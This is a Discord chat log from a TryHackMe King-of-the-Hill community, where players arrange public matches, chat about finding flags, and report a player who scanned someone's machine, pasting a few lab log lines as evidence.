ITs most important part is learning the best way to express what you are searching for on internet, i think

stiff egret
#

@narrow warren

narrow warren
#

I've wrote

#

"chattr for windows"

#

instead

warm marlin
sour zealot
fair adder
#

isnt it cute when people get mad and start scanning your machine?

#

10.10.20.168 - - [15/May/2021 19:08:33] code 501, message Unsupported method ('OPTIONS') 10.10.20.168 - - [15/May/2021 19:08:33] "OPTIONS / HTTP/1.1" 501 -

#

i love it

#

10.6.73.140 is his thm ip btw

short tusk
#

Reee

narrow warren
#

KEK

short tusk
#

@fair adder email this to the koth email and I’ll forward it to Skidy

fair adder
sour vectorBOT
#

Gave +1 Rep to @short tusk

brazen cloud
#

Aye yeah let us know and we'll get this awful behaviour resolved

sour zealot
stiff egret
#

Random public match, starting in 23 minutes

fair adder
#

hey @stiff egret can u check dm please? :))

stiff egret
#

Just saw them, must've missed them

stiff egret
#

3 remaining slots

static aspen
#

srry i have to update apt rq

fair adder
#

u got a flag already?

#

gg

static aspen
#

i got A flag

#

theres multiple

fair adder
#

ye

static aspen
#

your looking for king.txt

#

whooo hooo

fair adder
#

yeah im stuck

#

lol

static aspen
#

ripp

#

i have to say this one has many things you have to do

fair adder
#

yeah

static aspen
#

i need to find 4 more flags

#

3*

#

f

#

whaaaa

#

you can mess with me but you cant beat me

#

idk maybe that was me by accident

#

maybe i chose too hard of a room for even me a bit srry

fair adder
#

lol im lost

#

thats np

#

i pretty much stopped trying rn

static aspen
#

welp srry we can try a easier room like shrek if you want to sometime

fair adder
#

of course

#

do you mind atleast sharing how you got machine access in dms after game?

#

curious

static aspen
#

sure

fair adder
#

thx

static aspen
#

hey btw @latent osprey when we're done can you show me your loop your using

static aspen